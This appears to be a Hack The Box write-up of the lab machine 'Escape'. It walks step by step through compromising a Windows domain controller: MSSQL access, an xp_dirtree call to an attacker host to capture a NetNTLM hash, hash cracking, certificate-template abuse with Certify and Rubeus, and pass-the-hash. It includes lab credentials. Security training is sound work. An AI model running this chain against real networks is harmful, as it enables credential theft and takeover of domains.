Featured image of post HTB: Escape

HTB: Escape

Hack the box Escape walkthrough

Escape

Initial Enumeration

We can start off with an nmap scan:

1
nmap -sV -T4 -p- -Pn 10.129.228.253
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-06 10:14:24Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

The open ports indicate that this is probably a domain controller. We can also see the domain is sequel.htb.

If we try to list SMB shares, we see that “Public” might be open:

1
smbclient -L //escape.htb -N
1
2
3
4
5
6
7
8
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Public          Disk      
	SYSVOL          Disk      Logon server share 

We can login with:

1
smbclient //escape.htb/public

ls shows one document: SQL Server Procedures.pdf. This can be downloaded with:

1
get "SQL Server Procedures.pdf"

The document gives us information about an instance of MSSQL that might be running on the DC. Scrolling to the bottom, we can fond the credentials PublicUser : GuestUserCantWrite1.

Capture the hash with responder

Using these creds, we can log into the SQL server with:

1
impacket-mssqlclient [email protected]

Looking around, there doesn’t to seem to be any info in the database. However, we can steal the NetNTLM hash of the user who is running instance of MSSQL by first setting up responder with:

1
sudo responder -I tun0

And then getting the SQL DB to attempt to authenticate to an SMB share on our machine with:

1
xp_dirtree '\\<ATTACKER-IP>\something'

This gets us the hash for the sql_svc user.

This hash can be cracked with john:

1
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This gives us the credential sql_svc : REGGIE1234ronnie.

Escalation to Ryan.Cooper

With the creds we found for sql_svc, we can log in to the server with evil winrm:

1
evil-winrm -i $IP -u 'sql_svc' -p 'REGGIE1234ronnie'

If we look at the root of the C:\ drive, we find a SQLServer folder, which contains a subfolder Logs. Inside is a file ERRORLOG.BAK. if look through the file carefully, we find that sequel.htb\Ryan.Cooper failed to log in, which is shortly followed by a failed login from NuclearMosquito3. It seems that Ryan may have used his password as a username by mistake.

We can confirm that is his password by logging in with evil-winrm:

1
evil-winrm -i $IP -u 'Ryan.Cooper' -p 'NuclearMosquito3'

Escalation to Administrator

One common escalation path in AD environments is a misconfigured Active Directory Certificate Services. For a full overview of what were about to do, see the following article: https://posts.specterops.io/certified-pre-owned-d95910965cd2. Essentially, we are going to take advantage of a misconfigured certificate template to request a certificate for the domain admin, and use that certificate to get a TGT, which we can get the NTLM hash from, and log into the machine as an admin. We’re going to use Certify.exe to find the vulnerable certificate template, and request the certificate. You can download a pre-compiled Certify.exe (and a pre-compiled Rubeus.exe, which we will need in a bit) from https://github.com/r3motecontrol/Ghostpack-CompiledBinaries. This is not something I would use in a real engagement, but comes in hand for Hack the Box.

After uploading Certify.exe to the box, we can find vulnerable templates with:

1
.\certify.exe find /vulnerable

We find there is a vulnerable template UserAuthentication. We can request a certificate for Administrator with:

1
.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

In the above command, sequel-DC-CA is the name of the Enterprise CA, and can be found from the output of the first command (see screenshot). The altname is the name of the user we want a certificate for.

Copy the contents of the certificate back to your host, (everything between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE-----) and save it in a file as cert.pem. The certificate can then be converted to the pfx format with:

1
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Don’t enter a password when prompted.

Upload the pfx file, along with a copy of Rubeus.exe that you downloaded earlier. You can then request a TGT for Administrator that will include the hash with:

1
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials

We can then log into the DC with the hash that came with the ticket:

1
evil-winrm -i $IP -u 'Administrator' -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Built with Hugo
Theme Stack designed by Jimmy